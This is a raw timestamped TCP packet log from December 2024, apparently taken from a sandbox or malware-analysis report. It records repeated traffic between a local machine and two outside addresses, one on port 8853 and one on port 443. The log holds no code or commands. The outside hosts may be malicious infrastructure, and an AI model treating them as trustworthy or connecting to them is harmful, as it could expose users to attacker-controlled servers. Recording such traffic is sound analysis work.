Dec 29, 2024 11:18:15.969875097 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.975425005 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.975553989 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.975636005 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.981039047 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.981070995 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.981168032 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.986753941 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.986967087 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.987059116 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.992378950 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.992552042 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.992602110 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:15.998106003 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.998142958 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:15.998194933 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.003695965 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.003760099 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.003833055 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.009382010 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.009505987 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.009556055 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.015043020 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.015167952 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.015307903 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.020740986 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.020831108 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.020931959 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.026480913 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.026674986 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.026774883 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.032082081 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.032174110 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.032232046 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.037852049 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.037884951 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.038018942 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.043426037 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.043528080 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.043596029 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.049160957 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.049237013 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.049309015 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.054831028 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.054954052 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.055016041 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.060529947 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.060585022 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.060657978 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.066111088 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.174139023 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.174300909 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.174328089 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.176140070 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.176244974 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.176248074 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.180304050 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.180356979 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.180423021 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.182400942 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:16.182507038 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.182507038 CET	49707	8853	192.168.2.7	118.107.44.219
Dec 29, 2024 11:18:16.301831007 CET	8853	49707	118.107.44.219	192.168.2.7
Dec 29, 2024 11:18:17.435825109 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:17.435904980 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:17.436952114 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:17.437007904 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:17.571505070 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:17.571542025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:17.571914911 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:17.571981907 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:17.610307932 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:17.655333042 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.219584942 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.219614029 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.219630957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.219727039 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.219755888 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.219768047 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.219822884 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.422472000 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.422501087 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.422549963 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.422583103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.422597885 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.422627926 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.467268944 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.467294931 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.467396975 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.467425108 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.467472076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.599157095 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.599189043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.599281073 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.599332094 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.599376917 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.627398968 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.627424955 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.627563953 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.627604961 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.627657890 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.646996021 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.647027969 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.647109985 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.647140980 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.647186041 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.667022943 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.667042017 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.667139053 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.667151928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.667193890 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.797874928 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.797904015 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.797967911 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.797996998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.798027039 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.798034906 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.813132048 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.813160896 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.813244104 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.813271046 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.813318968 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.828499079 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.828526974 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.828602076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.828618050 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.828679085 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.841703892 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.841728926 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.841805935 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.841835022 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.841860056 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.841875076 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.858135939 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.858165026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.858216047 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.858225107 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.858268976 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.871423960 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.871440887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.871484995 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.871498108 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.871535063 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.886789083 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.886826992 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.886885881 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.886904001 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.886946917 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.998198986 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.998229980 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.998274088 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.998321056 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:18.998337984 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:18.998358011 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.008603096 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.008634090 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.008682966 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.008728027 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.008744955 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.008766890 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.019951105 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.019989967 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.020024061 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.020061970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.020076990 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.020095110 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.031184912 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.031227112 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.031301975 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.031332970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.031375885 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.041625023 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.041642904 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.041738987 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.041758060 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.041798115 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.053009987 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.053029060 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.053107977 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.053131104 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.053173065 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.062701941 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.062736988 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.062830925 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.062851906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.062889099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.073812008 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.073832035 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.073918104 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.073941946 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.073978901 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.197874069 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.197907925 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.198069096 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.198102951 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.198174953 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.206425905 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.206449986 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.206614971 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.206646919 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.206690073 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.213591099 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.213615894 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.213682890 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.213712931 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.213727951 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.213753939 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.222099066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.222125053 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.222253084 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.222282887 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.222330093 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.229973078 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.229994059 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.230117083 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.230148077 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.230199099 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.238548040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.238574028 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.238748074 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.238785982 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.238833904 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.246951103 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.246978998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.247100115 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.247133970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.247183084 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.255410910 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.255439043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.255548954 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.255580902 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.255635023 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.399225950 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.399251938 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.399497032 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.399525881 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.399576902 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.406332970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.406352997 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.406465054 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.406478882 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.406517982 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.414531946 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.414551020 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.414639950 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.414649963 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.414684057 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.422612906 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.422631025 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.422745943 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.422755957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.422792912 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.430263042 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.430279970 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.430356026 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.430365086 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.430416107 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.430433989 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.438425064 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.438445091 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.438512087 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.438520908 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.438560963 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.445585966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.445604086 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.445780993 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.445796013 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.445993900 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.453762054 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.453783989 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.454004049 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.454014063 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.454061031 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.600414038 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.600445032 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.600548983 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.600590944 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.600634098 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.608593941 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.608613968 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.608695030 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.608711004 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.608757973 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.615839005 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.615855932 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.615987062 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.615994930 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.616029978 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.623853922 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.623874903 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.623936892 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.623944998 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.623991966 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.624001980 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.631592035 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.631618977 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.631673098 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.631680965 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.631726027 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.639707088 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.639729977 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.639805079 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.639822006 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.639864922 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.647919893 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.647942066 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.648036957 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.648055077 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.648101091 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.655154943 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.655177116 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.655239105 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.655251026 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.655291080 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.801409960 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.801434040 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.801491976 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.801513910 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.801537037 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.801573038 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.809587955 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.809603930 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.809659004 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.809665918 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.809705019 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.817719936 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.817734957 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.817820072 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.817826986 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.817861080 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.824856043 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.824877024 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.824925900 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.824939966 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.824990034 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.833549023 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.833565950 CET	443	49708	47.79.48.211	192.168.2.7
Dec 29, 2024 11:18:19.833646059 CET	49708	443	192.168.2.7	47.79.48.211
Dec 29, 2024 11:18:19.833652973 CET	443	49708	47.79.48.211	192.168.2.7
